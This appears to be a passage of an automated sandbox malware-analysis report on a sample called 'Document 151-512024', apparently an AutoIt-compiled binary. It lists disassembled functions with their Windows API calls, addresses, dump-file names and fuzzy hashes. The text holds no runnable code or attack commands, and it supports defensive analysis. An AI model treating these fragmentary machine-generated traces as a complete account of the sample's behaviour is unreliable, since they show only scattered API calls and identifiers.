                                                                                                    • Opcode Fuzzy Hash: 9cab4115868ab2b9fa3454784a70f7e189f63d03aa486a20c192e32f9a4a8c76
                                                                                                    • Instruction Fuzzy Hash: 6111E732610205ABCF14BB60DC02FAD77A59F80B10F10842EF542A61C1EE74DA499B50
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __wsopen_s
                                                                                                    • String ID:
                                                                                                    • API String ID: 3347428461-0
                                                                                                    • Opcode ID: aecaff41d3e691e736a019012bd8dd3dd62bba5d08f775bed1e8f1549904ec47
                                                                                                    • Instruction ID: be941c3addc66b5f082b719ca65de83e683a571377804328d5d69492518b6346
                                                                                                    • Opcode Fuzzy Hash: aecaff41d3e691e736a019012bd8dd3dd62bba5d08f775bed1e8f1549904ec47
                                                                                                    • Instruction Fuzzy Hash: 92111876A0810AAFCB05DF58E945A9B7BF9EF48314F108059F808AB312DA71DA11CBA5
                                                                                                    APIs
                                                                                                    • ReadFile.KERNELBASE(?,?,00010000,00000000,00000000,?,?,00000000,?,0094543F,?,00010000,00000000,00000000,00000000,00000000), ref: 00949A9C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileRead
                                                                                                    • String ID:
                                                                                                    • API String ID: 2738559852-0
                                                                                                    • Opcode ID: 6013303b8bbdf22fd4a11e5999838a0ada3f0b2966639bc0a870acce470c8322
                                                                                                    • Instruction ID: 3904f981fb1aa951d5af61596af20befbd15fbdddca45c31158bd3c7fa9ad73c
                                                                                                    • Opcode Fuzzy Hash: 6013303b8bbdf22fd4a11e5999838a0ada3f0b2966639bc0a870acce470c8322
                                                                                                    • Instruction Fuzzy Hash: 551106312047059FD720CE16C885F67B7E9AB44764F14C42EE99B8AA51C771E949CB60
                                                                                                    APIs
                                                                                                      • Part of subcall function 00974C7D: RtlAllocateHeap.NTDLL(00000008,00941129,00000000,?,00972E29,00000001,00000364,?,?,?,0096F2DE,00973863,00A11444,?,0095FDF5,?), ref: 00974CBE
                                                                                                    • _free.LIBCMT ref: 0097506C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocateHeap_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 614378929-0
                                                                                                    • Opcode ID: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                                                                                                    • Instruction ID: 77f66cf8496d90d1b42f5056d874cf2514b66068543136fcd7286f6a2bafbcb3
                                                                                                    • Opcode Fuzzy Hash: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                                                                                                    • Instruction Fuzzy Hash: CE012B732047046BE3218F659841A5AFBECFBC5370F25451DE19C93280E6706805C674
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                                                                    • Instruction ID: 5d51a3f1840de3ffd4f3c3cc3cd3b28440a57392d9fe1954dcb90929ddc3c1fc
                                                                                                    • Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                                                                    • Instruction Fuzzy Hash: 22F02837A11A14AAC7313A79DD09B9B339C9FD2330F104B15F428931D2CB74E80286A6
                                                                                                    APIs
                                                                                                    • RtlAllocateHeap.NTDLL(00000008,00941129,00000000,?,00972E29,00000001,00000364,?,?,?,0096F2DE,00973863,00A11444,?,0095FDF5,?), ref: 00974CBE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocateHeap
                                                                                                    • String ID:
                                                                                                    • API String ID: 1279760036-0
                                                                                                    • Opcode ID: ae8f95c77ec49f1d6d2430037487f3469c679c27eb38e253aa69cfb49587a7d6
                                                                                                    • Instruction ID: f9ff4d125e4600731e484d330cf2e4f595bdf2568de45c0e653b45d41b2bb484
                                                                                                    • Opcode Fuzzy Hash: ae8f95c77ec49f1d6d2430037487f3469c679c27eb38e253aa69cfb49587a7d6
                                                                                                    • Instruction Fuzzy Hash: 54F0E933647225A7DB235F629C05BDA378CBF817A0B1DC512FD9DAA186CB30DC0186E0
                                                                                                    APIs
                                                                                                    • RtlAllocateHeap.NTDLL(00000000,?,00A11444,?,0095FDF5,?,?,0094A976,00000010,00A11440,009413FC,?,009413C6,?,00941129), ref: 00973852
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocateHeap
                                                                                                    • String ID:
                                                                                                    • API String ID: 1279760036-0
                                                                                                    • Opcode ID: 4f5dfd3b548a34c9c9aa9401ad6bc85cc2adf4cc7613bc05bf15bbe881c1e842
                                                                                                    • Instruction ID: d3ee36bf88db97a3992d7dce0568b4c171280a4f4652219b7ca288709c9f0c99
                                                                                                    • Opcode Fuzzy Hash: 4f5dfd3b548a34c9c9aa9401ad6bc85cc2adf4cc7613bc05bf15bbe881c1e842
                                                                                                    • Instruction Fuzzy Hash: 94E0ED37101225A6E7212AA69C00FDA3B5CAB827B0F05C122BC1D96981CB31DE01A2E2
                                                                                                    APIs
                                                                                                    • FreeLibrary.KERNEL32(?,?,00A11418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00944F6D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeLibrary
                                                                                                    • String ID:
                                                                                                    • API String ID: 3664257935-0
                                                                                                    • Opcode ID: 78bc969b87a5e8679277f82ba410e3c53cadb044b0d8a5d6f9f7b07ba7c4b64d
                                                                                                    • Instruction ID: 229854d90340d24e1f82860d38e1512f03403929f2472f2131c8cfb79a6ea9ab
                                                                                                    • Opcode Fuzzy Hash: 78bc969b87a5e8679277f82ba410e3c53cadb044b0d8a5d6f9f7b07ba7c4b64d
                                                                                                    • Instruction Fuzzy Hash: D5F03071105752CFDB389F64D490E12B7E4AF143193108DBEE1EA82521C7319848DF50
                                                                                                    APIs
                                                                                                    • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00942DC4
                                                                                                      • Part of subcall function 00946B57: _wcslen.LIBCMT ref: 00946B6A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LongNamePath_wcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 541455249-0
                                                                                                    • Opcode ID: 960a5199e446c9c7ee5026c699149c817580f7ce438ad7555ad049ed8b652ec3
                                                                                                    • Instruction ID: 44d64600b16ee40a371ca488e758a4502116e0e3d4517d4e01e1b8a5f56f9b2f
                                                                                                    • Opcode Fuzzy Hash: 960a5199e446c9c7ee5026c699149c817580f7ce438ad7555ad049ed8b652ec3
                                                                                                    • Instruction Fuzzy Hash: A7E0CDB26041245BCB10A2589C05FDA77DDDFC8790F040071FD09D7248DA60ED80C651
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __fread_nolock
                                                                                                    • String ID:
                                                                                                    • API String ID: 2638373210-0
                                                                                                    • Opcode ID: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                                                                                                    • Instruction ID: 84fc45d860badec84d8db9860e7fde9b89caeacf4308d77155e81b52cfbaf2c8
                                                                                                    • Opcode Fuzzy Hash: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                                                                                                    • Instruction Fuzzy Hash: 5DE04FB0609B009FDF399B28A9517F677E8DF4A310F00086EF69B83252E57268468A4D
                                                                                                    APIs
                                                                                                      • Part of subcall function 00943837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00943908
                                                                                                      • Part of subcall function 0094D730: GetInputState.USER32 ref: 0094D807
                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00942B6B
                                                                                                      • Part of subcall function 009430F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 0094314E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: IconNotifyShell_$CurrentDirectoryInputState
                                                                                                    • String ID:
                                                                                                    • API String ID: 3667716007-0
                                                                                                    • Opcode ID: c47ccf3d2d01e66a3398d5e559a31f296c0208da12903287a235f0e642f87bca
                                                                                                    • Instruction ID: 9df6fdc4b1c4862f578f12a1dda94c4de999070d7f1c7f4b254445ddab086f1d
                                                                                                    • Opcode Fuzzy Hash: c47ccf3d2d01e66a3398d5e559a31f296c0208da12903287a235f0e642f87bca
                                                                                                    • Instruction Fuzzy Hash: 69E0866170424407CA08BB749852EADF7599BD1755F40553EF146832A3CE6545858351
                                                                                                    APIs
                                                                                                    • CreateFileW.KERNELBASE(00000000,00000000,?,00980704,?,?,00000000,?,00980704,00000000,0000000C), ref: 009803B7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 823142352-0
                                                                                                    • Opcode ID: da74276c271a7c1c4d1643b00647f6b18b485fd47feb7acdfff716e2c8c05991
                                                                                                    • Instruction ID: f5f58c20fb1ceba712b33a8a288256ff42fb8d343733512c43e1a6bc5903da6b
                                                                                                    • Opcode Fuzzy Hash: da74276c271a7c1c4d1643b00647f6b18b485fd47feb7acdfff716e2c8c05991
                                                                                                    • Instruction Fuzzy Hash: A8D06C3205410DBBDF028F84DD06EDA3BAAFB48714F014000BE1856020C732E861EB90
                                                                                                    APIs
                                                                                                    • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00941CBC
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InfoParametersSystem
                                                                                                    • String ID:
                                                                                                    • API String ID: 3098949447-0
                                                                                                    • Opcode ID: 40c2cc8551d8f8239842be8b3c2ee4b5cde31fa4403d87e78f5caff4f801f417
                                                                                                    • Instruction ID: 9ff47275c7002556f23262e43f3c4c2e45b12e4ebffb88538293e4efa7377d73
                                                                                                    • Opcode Fuzzy Hash: 40c2cc8551d8f8239842be8b3c2ee4b5cde31fa4403d87e78f5caff4f801f417
                                                                                                    • Instruction Fuzzy Hash: 9FC092362C4305AFF654CBC0BC8EF907B66E348B14F04C102F709A96E3C3A26861EB50
                                                                                                    APIs
                                                                                                      • Part of subcall function 00945745: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0094949C,?,00008000), ref: 00945773
                                                                                                    • GetLastError.KERNEL32(00000002,00000000), ref: 009B76DE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateErrorFileLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 1214770103-0
                                                                                                    • Opcode ID: ad36cfbd30d4908794aa140847af8cc15186247c71e595c460cc33028a096167
                                                                                                    • Instruction ID: 453437c1a822dd4389b0530f1ccdee251a863d00f300fa0d070deb23b2a8eb37
                                                                                                    • Opcode Fuzzy Hash: ad36cfbd30d4908794aa140847af8cc15186247c71e595c460cc33028a096167
                                                                                                    • Instruction Fuzzy Hash: 70819F302087019FCB14EF68C591BAAB7E5BFC9320F044A5DF8965B292DB70ED45CB92
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 4275171209-0
                                                                                                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                    • Instruction ID: 1b7acea36ede0eba1c784e51cc698f72b405f24f647f4ede6067a7277a80e7e9
                                                                                                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                    • Instruction Fuzzy Hash: A0312474A001099BC718CF1AD0A0969F7BAFF49321B6486B5E849CF695D731EDC4CBC0
                                                                                                    APIs
                                                                                                    • Sleep.KERNELBASE(000001F4), ref: 01BC2311
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1226007560.0000000001BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_1bc0000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Sleep
                                                                                                    • String ID:
                                                                                                    • API String ID: 3472027048-0
                                                                                                    • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                    • Instruction ID: cf91ec4e86a335de29ff38e11f123f35b18bdb6ce5f62b61ac240dd0d508d5ff
                                                                                                    • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                    • Instruction Fuzzy Hash: 5CE0E67494020DDFDB00EFB4D54969E7FB4EF44702F1005A5FD01D2281D7319D508A62
                                                                                                    APIs
                                                                                                      • Part of subcall function 00959BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00959BB2
                                                                                                    • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 009D961A
                                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 009D965B
                                                                                                    • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 009D969F
                                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 009D96C9
                                                                                                    • SendMessageW.USER32 ref: 009D96F2
                                                                                                    • GetKeyState.USER32(00000011), ref: 009D978B
                                                                                                    • GetKeyState.USER32(00000009), ref: 009D9798
                                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 009D97AE
                                                                                                    • GetKeyState.USER32(00000010), ref: 009D97B8
                                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 009D97E9
                                                                                                    • SendMessageW.USER32 ref: 009D9810
                                                                                                    • SendMessageW.USER32(?,00001030,?,009D7E95), ref: 009D9918
                                                                                                    • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 009D992E
                                                                                                    • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 009D9941
                                                                                                    • SetCapture.USER32(?), ref: 009D994A
                                                                                                    • ClientToScreen.USER32(?,?), ref: 009D99AF
                                                                                                    • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 009D99BC
                                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 009D99D6
                                                                                                    • ReleaseCapture.USER32 ref: 009D99E1
                                                                                                    • GetCursorPos.USER32(?), ref: 009D9A19
                                                                                                    • ScreenToClient.USER32(?,?), ref: 009D9A26
                                                                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 009D9A80
                                                                                                    • SendMessageW.USER32 ref: 009D9AAE
                                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 009D9AEB
                                                                                                    • SendMessageW.USER32 ref: 009D9B1A
                                                                                                    • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 009D9B3B
                                                                                                    • SendMessageW.USER32(?,0000110B,00000009,?), ref: 009D9B4A
                                                                                                    • GetCursorPos.USER32(?), ref: 009D9B68
                                                                                                    • ScreenToClient.USER32(?,?), ref: 009D9B75
                                                                                                    • GetParent.USER32(?), ref: 009D9B93
                                                                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 009D9BFA
                                                                                                    • SendMessageW.USER32 ref: 009D9C2B
                                                                                                    • ClientToScreen.USER32(?,?), ref: 009D9C84
                                                                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 009D9CB4
                                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 009D9CDE
                                                                                                    • SendMessageW.USER32 ref: 009D9D01
                                                                                                    • ClientToScreen.USER32(?,?), ref: 009D9D4E
                                                                                                    • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 009D9D82
                                                                                                      • Part of subcall function 00959944: GetWindowLongW.USER32(?,000000EB), ref: 00959952
                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 009D9E05
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                                                                                    • String ID: 0n$@GUI_DRAGID$F
                                                                                                    • API String ID: 3429851547-1617144029
                                                                                                    • Opcode ID: b1b41ce23180790b97cb38c15cf00904761a87506c8152d30f68d43d42514d22
                                                                                                    • Instruction ID: 38cf39473eb6f1fc8ce262750596a02858ec145e399c80a943097512b6ea0d4f
                                                                                                    • Opcode Fuzzy Hash: b1b41ce23180790b97cb38c15cf00904761a87506c8152d30f68d43d42514d22
                                                                                                    • Instruction Fuzzy Hash: 5642BF74249201AFDB20EF64CC44FAABBE9FF48314F508A1AF699973A1D731E850DB51
                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 009D48F3
